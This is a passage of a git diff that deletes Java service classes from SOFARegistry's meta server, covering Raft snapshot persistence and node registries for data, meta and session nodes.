for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.service; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.node.NodeOperator; -import com.alipay.sofa.registry.server.meta.repository.NodeConfirmStatusService; -import com.alipay.sofa.registry.store.api.annotation.RaftService; - -import java.io.IOException; -import java.util.Collection; -import java.util.HashSet; -import java.util.Map; -import java.util.Queue; -import java.util.Set; -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.LinkedBlockingQueue; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: DataConfirmStatusService.java, v 0.1 2018-05-15 17:53 shangyu.wh Exp $ - */ -@RaftService(uniqueId = "dataServer") -public class DataConfirmStatusService extends AbstractSnapshotProcess - implements - NodeConfirmStatusService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataConfirmStatusService.class); - - /** - * store new data node status,The status can be removed after confirm by all registered other node - */ - private ConcurrentHashMap> expectNodes = new ConcurrentHashMap<>(); - private BlockingQueue expectNodesOrders = new LinkedBlockingQueue(); - - private Set snapShotFileNames = new HashSet<>(); - - private static final String NODE_EXTEND_NAME = "expectNodes"; - - private static final String NODE_ORDERS_EXTEND_NAME = "expectNodesOrders"; - - /** - * constructor - */ - public DataConfirmStatusService() { - } - - /** - * constructor - * @param expectNodes - * @param expectNodesOrders - */ - public DataConfirmStatusService(ConcurrentHashMap> expectNodes, - BlockingQueue expectNodesOrders) { - this.expectNodes = expectNodes; - this.expectNodesOrders = expectNodesOrders; - } - - @Override - public SnapshotProcess copy() { - return new DataConfirmStatusService(new ConcurrentHashMap<>(expectNodes), - new LinkedBlockingQueue<>(expectNodesOrders)); - } - - @Override - public void putConfirmNode(DataNode node, DataOperator nodeOperate) { - try { - expectNodesOrders.put(new NodeOperator(node, nodeOperate)); - LOGGER.info("Put operate:{} node:{} expect be confirm.", nodeOperate, node); - } catch (InterruptedException e) { - LOGGER.error("Put expect status list interrupt!", e); - } - } - - @Override - public NodeOperator peekConfirmNode() { - return expectNodesOrders.peek(); - } - - @Override - public NodeOperator pollConfirmNode() throws InterruptedException { - return expectNodesOrders.poll(1, TimeUnit.SECONDS); - } - - @Override - public Queue getAllConfirmNodes() { - return expectNodesOrders; - } - - @Override - public Map putExpectNodes(DataNode confirmNode, Map addNodes) { - expectNodes.put(confirmNode, addNodes); - LOGGER.info("Put ExpectNodes: expect be confirm {} expectNodes all {}", - confirmNode.getIp(), expectNodes); - return addNodes; - } - - @Override - public Map getExpectNodes(DataNode confirmNode) { - Map map = expectNodes.get(confirmNode); - LOGGER.info("Get ExpectNodes:{} node:{} expect be confirm. expectNodes all {}", map, - confirmNode.getIp(), expectNodes); - return map; - } - - @Override - public Map removeExpectConfirmNodes(DataNode confirmNode, Collection ips) { - Map map = expectNodes.get(confirmNode); - if (map != null) { - if (ips != null && !ips.isEmpty()) { - ips.forEach(ipAddress -> { - DataNode old = map.remove(ipAddress); - if (old == null) { - LOGGER.warn("Get Expect confirmNode ip {} not existed!", ipAddress); - } - }); - } - } else { - LOGGER.warn("Get Expect confirmNode {} not existed!", confirmNode); - } - LOGGER.info("Remove expect confirmNode:{} remove ips:{}. return all {}", confirmNode.getIp(), ips, map); - return map; - } - - @Override - public Map removeExpectNodes(DataNode confirmNode) { - return expectNodes.remove(confirmNode); - } - - @Override - public boolean save(String path) { - if (path == null) { - throw new IllegalArgumentException("Input path can't be null!"); - } - - if (path.endsWith(NODE_ORDERS_EXTEND_NAME)) { - return save(path, expectNodesOrders); - } else { - return save(path, expectNodes); - } - - } - - @Override - public synchronized boolean load(String path) { - try { - if (path == null) { - throw new IllegalArgumentException("Input path can't be null!"); - } - - if (path.endsWith(NODE_ORDERS_EXTEND_NAME)) { - BlockingQueue queue = load(path, expectNodesOrders.getClass()); - expectNodesOrders.clear(); - expectNodesOrders.addAll(queue); - - } else { - ConcurrentHashMap> map = load(path, - expectNodes.getClass()); - expectNodes.clear(); - expectNodes.putAll(map); - } - return true; - } catch (IOException e) { - LOGGER.error("Load confirm expect Nodes data error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(getExtPath(this.getClass().getSimpleName(), NODE_EXTEND_NAME)); - snapShotFileNames.add(getExtPath(this.getClass().getSimpleName(), NODE_ORDERS_EXTEND_NAME)); - return snapShotFileNames; - } - - private String getExtPath(String path, String extentName) { - return path + "_" + extentName; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/DataRepositoryService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/DataRepositoryService.java deleted file mode 100644 index 716359bb3..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/DataRepositoryService.java +++ /dev/null @@ -1,366 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.service; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.repository.NodeRepository; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.store.RenewDecorate; -import com.alipay.sofa.registry.store.api.annotation.RaftService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.io.IOException; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; - -/** - * - * @author shangyu.wh - * @version $Id: DataRepositoryServcie.java, v 0.1 2018-05-08 13:11 shangyu.wh Exp $ - */ -@RaftService(uniqueId = "dataServer") -public class DataRepositoryService extends AbstractSnapshotProcess - implements - RepositoryService> { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataRepositoryService.class); - - @Autowired - private NodeConfig nodeConfig; - - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock.readLock(); - private final Lock write = readWriteLock - .writeLock(); - - /** - * data node store and version - */ - private Map registry = new ConcurrentHashMap<>(); - - private Set snapShotFileNames = new HashSet<>(); - - /** - * constructor - */ - public DataRepositoryService() { - } - - /** - * constructor - * @param registry - */ - public DataRepositoryService(Map registry) { - this.registry = registry; - } - - @Override - public SnapshotProcess copy() { - return new DataRepositoryService(new ConcurrentHashMap<>(registry)); - } - - @Override - public RenewDecorate put(String ipAddress, RenewDecorate dataNode) { - - write.lock(); - try { - String dataCenter = dataNode.getRenewal().getDataCenter(); - - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository == null) { - NodeRepository nodeRepository = new NodeRepository<>(dataCenter, - new ConcurrentHashMap<>(), System.currentTimeMillis()); - dataNodeRepository = registry.put(dataCenter, nodeRepository); - if (dataNodeRepository == null) { - dataNodeRepository = nodeRepository; - } - } - - dataNodeRepository.setVersion(System.currentTimeMillis()); - - Map> dataNodes = dataNodeRepository - .getNodeMap(); - RenewDecorate oldRenewDecorate = dataNodes.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - LOGGER.info("Data node with ipAddress:" + ipAddress + " has already existed!"); - } - - dataNodes.put(ipAddress, dataNode); - - } catch (Exception e) { - LOGGER.error("Data node add error!", e); - throw new RuntimeException("Data node add error!", e); - } finally { - write.unlock(); - } - - return dataNode; - } - - @Override - public RenewDecorate remove(Object key) { - - write.lock(); - try { - String ipAddress = (String) key; - - String dataCenter = nodeConfig.getLocalDataCenter(); - - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - Map> dataNodes = dataNodeRepository - .getNodeMap(); - if (dataNodes != null) { - RenewDecorate oldRenewDecorate = dataNodes.remove(ipAddress); - if (oldRenewDecorate == null) { - LOGGER.warn("Data node with ipAddress:" + ipAddress + " has not exist!"); - return null; - } - - dataNodeRepository.setVersion(System.currentTimeMillis()); - return oldRenewDecorate; - } - } - return null; - } catch (Exception e) { - LOGGER.error("Data node remove error!", e); - throw new RuntimeException("Data node remove error!", e); - } finally { - write.unlock(); - } - } - - @Override - public RenewDecorate replace(String ipAddress, RenewDecorate dataNode) { - - write.lock(); - try { - String dataCenter = dataNode.getRenewal().getDataCenter(); - - NodeRepository dataNodeRepository = registry.get(dataCenter); - - if (dataNodeRepository != null) { - - Map> dataNodes = dataNodeRepository - .getNodeMap(); - RenewDecorate oldRenewDecorate = dataNodes.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - oldRenewDecorate.setRenewal(dataNode.getRenewal()); - oldRenewDecorate.reNew(); - } else { - LOGGER.error("Data node with ipAddress {} has not existed!", ipAddress); - throw new RuntimeException(String.format( - "Data node with ipAddress %s has not existed!", ipAddress)); - } - } else { - LOGGER.error("Data node in dataCenter: {} has not existed!", dataCenter); - throw new RuntimeException(String.format( - "Data node in dataCenter: %s has not existed!", dataCenter)); - } - - return dataNode; - } catch (Exception e) { - LOGGER.error("Data node replace error!", e); - throw new RuntimeException("Data node replace error!", e); - } finally { - write.unlock(); - } - } - - /** - * this function deal with dataCenter all data,according version and dataMap - * @param dataCenter - * @param map - * @return - */ - @Override - public Map> replaceAll(String dataCenter, - Map> map, - Long version) { - - Map> oldMap; - write.lock(); - try { - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - oldMap = dataNodeRepository.getNodeMap(); - if (oldMap == null) { - LOGGER.warn("Data node in dataCenter: {} has not existed!", dataCenter); - } - dataNodeRepository.setNodeMap(map); - dataNodeRepository.setVersion(version); - return oldMap; - } else { - registry.put(dataCenter, new NodeRepository(dataCenter, map, version)); - return map; - } - } finally { - write.unlock(); - } - } - - @Override - public RenewDecorate get(Object key) { - - read.lock(); - try { - String ipAddress = (String) key; - - String dataCenter = nodeConfig.getLocalDataCenter(); - - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - Map> dataNodes = dataNodeRepository - .getNodeMap(); - if (dataNodes != null) { - RenewDecorate oldRenewDecorate = dataNodes.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - return oldRenewDecorate; - } else { - LOGGER.warn( - "Data node with ipAddress {} has not existed!It not be registered!", - ipAddress); - return null; - } - } else { - LOGGER.warn("Data node map has not existed in dataCenter:{}!", dataCenter); - return null; - } - } else { - LOGGER.error("Data node in dataCenter: {} has not existed!", dataCenter); - throw new RuntimeException(String.format( - "Data node in dataCenter: %s has not existed!", dataCenter)); - } - } catch (Exception e) { - LOGGER.error("Get Data node error!", e); - throw new RuntimeException("Get Data node error!", e); - } finally { - read.unlock(); - } - - } - - @Override - public Map> getAllData() { - read.lock(); - try { - Map> nodes = new ConcurrentHashMap<>(); - registry.forEach((dataCenter, dataNodeRepository) -> nodes.putAll(dataNodeRepository.getNodeMap())); - return nodes; - } finally { - read.unlock(); - } - } - - @Override - public Map>> getAllDataMap() { - Map>> nodes = new ConcurrentHashMap<>(); - read.lock(); - try { - registry.forEach( - (dataCenter, dataNodeRepository) -> nodes.put(dataCenter, dataNodeRepository.getNodeMap())); - return nodes; - } finally { - read.unlock(); - } - } - - @Override - public Map getNodeRepositories() { - return registry; - } - - /** - * Setter method for property nodeConfig. - * - * @param nodeConfig value to be assigned to property nodeConfig - */ - public void setNodeConfig(NodeConfig nodeConfig) { - this.nodeConfig = nodeConfig; - } - - @Override - public boolean save(String path) { - return save(path, registry); - } - - @Override - public synchronized boolean load(String path) { - try { - Map map = load(path, registry.getClass()); - registry.clear(); - registry.putAll(map); - return true; - } catch (IOException e) { - LOGGER.error("Load registry data error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(this.getClass().getSimpleName()); - return snapShotFileNames; - } - - @Override - public boolean checkVersion(String dataCenter, Long version) { - read.lock(); - try { - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - Long oldValue = dataNodeRepository.getVersion(); - if (oldValue == null) { - return true; - } else { - return version > oldValue; - } - } else { - return true; - } - } finally { - read.unlock(); - } - } - - @Override - public Long getVersion(String dataCenter) { - read.lock(); - try { - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - return dataNodeRepository.getVersion(); - } - return null; - } finally { - read.unlock(); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/MetaRepositoryService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/MetaRepositoryService.java deleted file mode 100644 index 06bb4a26d..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/MetaRepositoryService.java +++ /dev/null @@ -1,350 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.service; - -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.repository.NodeRepository; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.store.RenewDecorate; -import com.alipay.sofa.registry.store.api.annotation.RaftService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.io.IOException; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; - -/** - * - * @author shangyu.wh - * @version $Id: MetaRepositoryService.java, v 0.1 2018-07-30 16:51 shangyu.wh Exp $ - */ -@RaftService(uniqueId = "metaServer") -public class MetaRepositoryService extends AbstractSnapshotProcess - implements - RepositoryService> { - - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaRepositoryService.class); - - @Autowired - private NodeConfig nodeConfig; - - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock.readLock(); - private final Lock write = readWriteLock - .writeLock(); - - /** - * meta node store and version - */ - private Map registry = new ConcurrentHashMap<>(); - - private Set snapShotFileNames = new HashSet<>(); - - /** - * constructor - */ - public MetaRepositoryService() { - } - - /** - * constructor - * @param registry - */ - public MetaRepositoryService(Map registry) { - this.registry = registry; - } - - @Override - public SnapshotProcess copy() { - return new MetaRepositoryService(new ConcurrentHashMap<>(registry)); - } - - @Override - public RenewDecorate put(String ipAddress, RenewDecorate metaNode) { - write.lock(); - try { - String dataCenter = metaNode.getRenewal().getDataCenter(); - - NodeRepository metaNodeRepository = registry.get(dataCenter); - if (metaNodeRepository == null) { - NodeRepository nodeRepository = new NodeRepository<>(dataCenter, - new ConcurrentHashMap<>(), System.currentTimeMillis()); - metaNodeRepository = registry.put(dataCenter, nodeRepository); - if (metaNodeRepository == null) { - metaNodeRepository = nodeRepository; - } - } - - metaNodeRepository.setVersion(System.currentTimeMillis()); - - Map> metaNodes = metaNodeRepository - .getNodeMap(); - RenewDecorate oldRenewDecorate = metaNodes.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - LOGGER.info("Meta node with ipAddress:" + ipAddress + " has already existed!"); - } - - metaNodes.put(ipAddress, metaNode); - - } catch (Exception e) { - LOGGER.error("Meta node add error!", e); - throw new RuntimeException("Meta node add error!", e); - } finally { - write.unlock(); - } - - return metaNode; - } - - @Override - public RenewDecorate remove(Object key) { - write.lock(); - try { - String ipAddress = (String) key; - - String dataCenter = nodeConfig.getLocalDataCenter(); - - NodeRepository metaNodeRepository = registry.get(dataCenter); - if (metaNodeRepository != null) { - Map> metaNodes = metaNodeRepository - .getNodeMap(); - if (metaNodes != null) { - RenewDecorate oldRenewDecorate = metaNodes.remove(ipAddress); - if (oldRenewDecorate == null) { - LOGGER.warn("Meta node with ipAddress:" + ipAddress + " has not exist!"); - return null; - } - - metaNodeRepository.setVersion(System.currentTimeMillis()); - return oldRenewDecorate; - } - } - return null; - } catch (Exception e) { - LOGGER.error("Meta node remove error!", e); - throw new RuntimeException("Meta node remove error!", e); - } finally { - write.unlock(); - } - } - - @Override - public RenewDecorate replace(String ipAddress, RenewDecorate metaNode) { - write.lock(); - try { - String dataCenter = metaNode.getRenewal().getDataCenter(); - - NodeRepository metaNodeRepository = registry.get(dataCenter); - - if (metaNodeRepository != null) { - Map> dataNodes = metaNodeRepository - .getNodeMap(); - - if (dataNodes != null) { - RenewDecorate oldRenewDecorate = dataNodes.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - oldRenewDecorate.setRenewal(metaNode.getRenewal()); - oldRenewDecorate.reNew(); - - metaNodeRepository.setVersion(System.currentTimeMillis()); - } else { - LOGGER.error("Meta node with ipAddress {} has not existed!", ipAddress); - throw new RuntimeException(String.format( - "Meta node with ipAddress %s has not existed!", ipAddress)); - } - } else { - LOGGER.error("Meta node in dataCenter {} has not existed!", dataCenter); - throw new RuntimeException(String.format( - "Meta node in dataCenter %s has not existed!", dataCenter)); - } - } else { - LOGGER.error("Meta node in dataCenter: {} has not existed!", dataCenter); - throw new RuntimeException(String.format( - "Meta node in dataCenter: %s has not existed!", dataCenter)); - } - - return metaNode; - } catch (Exception e) { - LOGGER.error("Data node replace error!", e); - throw new RuntimeException("Data node replace error!", e); - } finally { - write.unlock(); - } - } - - @Override - public Map> replaceAll(String dataCenter, - Map> map, - Long version) { - Map> oldMap; - write.lock(); - try { - - NodeRepository metaNodeRepository = registry.get(dataCenter); - if (metaNodeRepository != null) { - oldMap = metaNodeRepository.getNodeMap(); - if (oldMap == null) { - LOGGER.warn("Meta node in dataCenter: {} has not existed!", dataCenter); - } - metaNodeRepository.setNodeMap(map); - metaNodeRepository.setVersion(version); - return oldMap; - } else { - registry.put(dataCenter, new NodeRepository(dataCenter, map, version)); - return map; - } - } finally { - write.unlock(); - } - } - - @Override - public RenewDecorate get(Object key) { - read.lock(); - try { - String ipAddress = (String) key; - - String dataCenter = nodeConfig.getLocalDataCenter(); - - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - Map> metaNodes = dataNodeRepository - .getNodeMap(); - if (metaNodes == null) { - LOGGER.error("Meta node in dataCenter: {} has not existed!", dataCenter); - throw new RuntimeException(String.format( - "Meta node in dataCenter: %s has not existed!", dataCenter)); - } - RenewDecorate oldRenewDecorate = metaNodes.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - return oldRenewDecorate; - } else { - LOGGER.warn( - "Meta node with ipAddress {} has not existed!It not be registered!", - ipAddress); - return null; - } - } else { - LOGGER.error("Meta node in dataCenter: {} has not existed!", dataCenter); - throw new RuntimeException(String.format( - "Meta node in dataCenter: %s has not existed!", dataCenter)); - } - } catch (Exception e) { - LOGGER.error("Get meta node error!", e); - throw new RuntimeException("Get meta node error!", e); - } finally { - read.unlock(); - } - } - - @Override - public Map> getAllData() { - read.lock(); - try { - Map> nodes = new ConcurrentHashMap<>(); - registry.forEach((dataCenter, metaNodeRepository) -> nodes.putAll(metaNodeRepository.getNodeMap())); - return nodes; - } finally { - read.unlock(); - } - } - - @Override - public Map>> getAllDataMap() { - Map>> nodes = new ConcurrentHashMap<>(); - read.lock(); - try { - registry.forEach( - (dataCenter, metaNodeRepository) -> nodes.put(dataCenter, metaNodeRepository.getNodeMap())); - return nodes; - } finally { - read.unlock(); - } - } - - @Override - public Map getNodeRepositories() { - return registry; - } - - @Override - public boolean checkVersion(String dataCenter, Long version) { - read.lock(); - try { - NodeRepository metaNodeRepository = registry.get(dataCenter); - if (metaNodeRepository != null) { - Long oldValue = metaNodeRepository.getVersion(); - return oldValue == null || version > oldValue; - } else { - return true; - } - } finally { - read.unlock(); - } - } - - @Override - public Long getVersion(String dataCenter) { - read.lock(); - try { - NodeRepository dataNodeRepository = registry.get(dataCenter); - if (dataNodeRepository != null) { - return dataNodeRepository.getVersion(); - } - return null; - } finally { - read.unlock(); - } - } - - @Override - public boolean save(String path) { - return save(path, registry); - } - - @Override - public synchronized boolean load(String path) { - try { - Map map = load(path, registry.getClass()); - registry.clear(); - registry.putAll(map); - return true; - } catch (IOException e) { - LOGGER.error("Load registry meta error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(this.getClass().getSimpleName()); - return snapShotFileNames; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionConfirmStatusService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionConfirmStatusService.java deleted file mode 100644 index 325c35482..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionConfirmStatusService.java +++ /dev/null @@ -1,207 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.service; - -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.node.NodeOperator; -import com.alipay.sofa.registry.server.meta.repository.NodeConfirmStatusService; -import com.alipay.sofa.registry.store.api.annotation.RaftService; - -import java.io.IOException; -import java.util.Collection; -import java.util.HashSet; -import java.util.Map; -import java.util.Queue; -import java.util.Set; -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.LinkedBlockingQueue; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: DataConfirmStatusService.java, v 0.1 2018-05-15 17:53 shangyu.wh Exp $ - */ -@RaftService(uniqueId = "sessionServer") -public class SessionConfirmStatusService extends AbstractSnapshotProcess - implements - NodeConfirmStatusService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionConfirmStatusService.class); - - /** - * store new data node status,The status can be removed after confirm by all registered other node - */ - private ConcurrentHashMap> expectNodes = new ConcurrentHashMap<>(); - private BlockingQueue expectNodesOrders = new LinkedBlockingQueue(); - - private Set snapShotFileNames = new HashSet<>(); - - private static final String NODE_EXTEND_NAME = "expectNodes"; - - private static final String NODE_ORDERS_EXTEND_NAME = "expectNodesOrders"; - - /** - * constructor - */ - public SessionConfirmStatusService() { - } - - /** - * constructor - * @param expectNodes - * @param expectNodesOrders - */ - public SessionConfirmStatusService(ConcurrentHashMap> expectNodes, - BlockingQueue expectNodesOrders) { - this.expectNodes = expectNodes; - this.expectNodesOrders = expectNodesOrders; - } - - @Override - public SnapshotProcess copy() { - return new SessionConfirmStatusService(new ConcurrentHashMap<>(expectNodes), - new LinkedBlockingQueue<>(expectNodesOrders)); - } - - @Override - public void putConfirmNode(SessionNode node, DataOperator nodeOperate) { - try { - expectNodesOrders.put(new NodeOperator(node, nodeOperate)); - LOGGER.info("Put operate:{} node:{} expect be confirm.", nodeOperate, node); - } catch (InterruptedException e) { - LOGGER.error("Put expect status list interrupt!", e); - } - } - - @Override - public NodeOperator peekConfirmNode() { - return expectNodesOrders.peek(); - } - - @Override - public NodeOperator pollConfirmNode() throws InterruptedException { - return expectNodesOrders.poll(1, TimeUnit.SECONDS); - } - - @Override - public Queue getAllConfirmNodes() { - return expectNodesOrders; - } - - @Override - public Map putExpectNodes(SessionNode confirmNode, - Map addNodes) { - expectNodes.put(confirmNode, addNodes); - LOGGER.info("Put ExpectNodes:{} node:{} expect be confirm.expectNodes all {}", addNodes, - confirmNode, expectNodes); - return addNodes; - } - - @Override - public Map getExpectNodes(SessionNode confirmNode) { - Map map = expectNodes.get(confirmNode); - LOGGER.info("Get ExpectNodes:{} node:{} expect be confirm. expectNodes all {}", map, - confirmNode, expectNodes); - return map; - } - - @Override - public Map removeExpectNodes(SessionNode confirmNode) { - return expectNodes.remove(confirmNode); - } - - @Override - public Map removeExpectConfirmNodes(SessionNode confirmNode, Collection ips) { - - Map map = expectNodes.get(confirmNode); - if (map != null) { - if (ips != null && !ips.isEmpty()) { - ips.forEach(ipAddress -> { - SessionNode old = map.remove(ipAddress); - if (old == null) { - LOGGER.warn("Get Expect confirmNode ip {} not existed!", ipAddress); - } - }); - } - } else { - LOGGER.warn("Get Expect confirmNode {} not existed!", confirmNode); - } - LOGGER.info("Remove expect confirmNode:{} ips:{}. return all {}", confirmNode, ips, map); - return map; - } - - @Override - public boolean save(String path) { - if (path == null) { - throw new IllegalArgumentException("Input path can't be null!"); - } - - if (path.endsWith(NODE_ORDERS_EXTEND_NAME)) { - return save(path, expectNodesOrders); - } else { - return save(path, expectNodes); - } - - } - - @Override - public synchronized boolean load(String path) { - try { - if (path == null) { - throw new IllegalArgumentException("Input path can't be null!"); - } - - if (path.endsWith(NODE_ORDERS_EXTEND_NAME)) { - BlockingQueue queue = load(path, expectNodesOrders.getClass()); - expectNodesOrders.clear(); - expectNodesOrders.addAll(queue); - - } else { - ConcurrentHashMap> map = load(path, - expectNodes.getClass()); - expectNodes.clear(); - expectNodes.putAll(map); - } - return true; - } catch (IOException e) { - LOGGER.error("Load confirm expect Nodes data error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(getExtPath(this.getClass().getSimpleName(), NODE_EXTEND_NAME)); - snapShotFileNames.add(getExtPath(this.getClass().getSimpleName(), NODE_ORDERS_EXTEND_NAME)); - return snapShotFileNames; - } - - private String getExtPath(String path, String extentName) { - return path + "_" + extentName; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionRepositoryService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionRepositoryService.java deleted file mode 100644 index 4a4f4d10f..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionRepositoryService.java +++ /dev/null @@ -1,218 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.service; - -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; 